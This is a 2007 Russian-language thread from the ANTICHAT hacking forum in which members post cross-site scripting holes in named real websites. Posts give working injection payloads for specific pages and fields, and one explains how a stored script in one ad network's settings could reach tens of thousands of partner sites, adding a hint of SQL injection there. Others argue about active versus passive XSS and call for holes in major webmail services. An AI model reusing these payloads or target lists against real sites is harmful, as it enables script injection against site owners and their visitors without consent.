HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 01.05.2007, 13:56
Goudini
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
С нами: 10487223

Репутация: 490
По умолчанию

на ачате слева ссылка $$$ для web-мастеров
http://tak.ru/editing.php
в любом поле нет фильтрации : "><script>alert()</script>
 
Ответить с цитированием

  #2  
Старый 02.05.2007, 20:04
2pick
Познающий
Регистрация: 17.03.2007
Сообщений: 98
С нами: 10080415

Репутация: 45
По умолчанию

http://dyn.gismeteo.ru/cgi-bin/showmap.exe?base=commonmaps&file=BALTIC.GIF&lang=r us&title=%3Cscript%3Ealert('Here%20was%202pick');% 3C/script%3E
 
Ответить с цитированием

  #3  
Старый 02.05.2007, 21:16
mr.The
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,205
С нами: 10016425

Репутация: 1257


По умолчанию

Цитата:
http://dyn.gismeteo.ru/cgi-bin/showmap.exe ?base=commonmaps&file=BALTIC.GIF&lang=rus&title=%3 Cscript%3Ealert('Here%20was%202pick');%3C/script%3E
это пасивная

Последний раз редактировалось _Great_; 04.06.2007 в 22:04..
 
Ответить с цитированием

  #4  
Старый 04.05.2007, 08:10
Horsekiller
Познающий
Регистрация: 22.11.2006
Сообщений: 68
С нами: 10245582

Репутация: 137
По умолчанию

http://emo.nnov.ru/

Очень популярный сайт эморей

Уязвимо поле E-mail:

Код:
qwe@qwe.com"><script>alert()</script>
 
Ответить с цитированием

  #5  
Старый 09.05.2007, 12:48
Hawkins
Участник форума
Регистрация: 24.01.2007
Сообщений: 129
С нами: 10155803

Репутация: 145
По умолчанию

Для активной не нужно никаких действий со стороны пользователя.
 
Ответить с цитированием

  #6  
Старый 09.05.2007, 15:47
mr.The
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,205
С нами: 10016425

Репутация: 1257


По умолчанию

Цитата:
http://www.pfadi.ch/pal/tohuwabohu/guestbook/schreiben.php
уязвимы почти все поля
 
Ответить с цитированием

  #7  
Старый 09.05.2007, 15:53
Luccifer
Познающий
Регистрация: 05.12.2006
Сообщений: 63
С нами: 10227528

Репутация: 100
По умолчанию

Тема нах..не нужная вот если бы вы выкладывали активные xss на таких почтовиках как :rambler.ru, yandex.ru или лучше всего mail.ru то это другое дело....а это все не иначе как МУСОР...не кому нах... не нужный=))))
Пустая трата времни.
 
Ответить с цитированием

  #8  
Старый 09.05.2007, 15:57
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами: 10447337

Репутация: 807
По умолчанию

Если ты такой умный сам там ищи.
К тому же ты наверно слепой, потому что на всех перечисленных тобой сайтах выкладывали уже хсс.
 
Ответить с цитированием

  #9  
Старый 09.05.2007, 16:04
Luccifer
Познающий
Регистрация: 05.12.2006
Сообщений: 63
С нами: 10227528

Репутация: 100
По умолчанию

Цитата:
freddi
Но не все работают по сей день.Я именно про активные....

Последний раз редактировалось Luccifer; 09.05.2007 в 16:13..
 
Ответить с цитированием

  #10  
Старый 20.05.2007, 05:08
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
С нами: 10248806

Репутация: 2371


По умолчанию

Tak.ru
При регистрации уязвимы поля Login, ФИО, Email
Далее в настройках....
Уязвимы поля Название сайты, ссылка на него...
Так вот...
На этом сайте зарегистрированны 37к человек и размещают их рекламу на своем сайте....
И...в связи с этим...вы можете поломать множество сайтов...Как?
Очень просто.....
В панели управления, есть меню типа реклама..
Так вот там можно ставить разделитель рекламы....
Ставим
Код:
"><script>alert(/xss/)</script>
И вот.....хсски на нашем сайте...
А почему я сказал что другие сайты можем поломать??
ПОтому что также здесь есть sql-inj, это вы найдете сами =)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
mylivepage.ru активные XSS __XT__ Уязвимости 3 23.12.2006 14:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.